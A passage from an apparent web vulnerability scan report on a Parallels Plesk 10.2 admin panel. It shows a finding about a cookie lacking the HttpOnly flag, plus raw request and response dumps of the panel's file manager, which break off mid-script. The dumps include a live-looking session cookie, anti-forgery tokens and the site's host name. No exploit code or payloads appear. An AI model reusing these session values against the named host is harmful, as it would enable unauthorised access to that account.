   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokm..l (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Code Access Security</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-trust_level">CAS trust level</label></td>
           <td>



   <select name="trust_level" id="fid-trust_level" >    <option value='Full' SELECTED>Full</option>
   <option value='High'>High</option>
   <option value='Medium'>Medium</option>
   <option value='Low'>Low</option>
   <option value='Minimal'>Minimal</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Session Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-auth_mode">Authentication mode</label></td>
           <td>



   <select name="auth_mode" id="fid-auth_mode" >    <option value='Windows' SELECTED>Windows</option>
   <option value='Forms'>Forms</option>
   <option value='Passport'>Passport</option>
   <option value='None'>None</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-sess_timeout">Session timeout (minutes)</label></td>
           <td>





   <input type="text" name="sess_timeout" id="fid-sess_timeout" value="20"} size="15">





           </td>
       </tr>

   </table>

</td></tr></table></fieldset>


<input type="hidden" name="groupName" value="">
<input type="hidden" name="web_path" value="">

</div>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.22. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 54609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
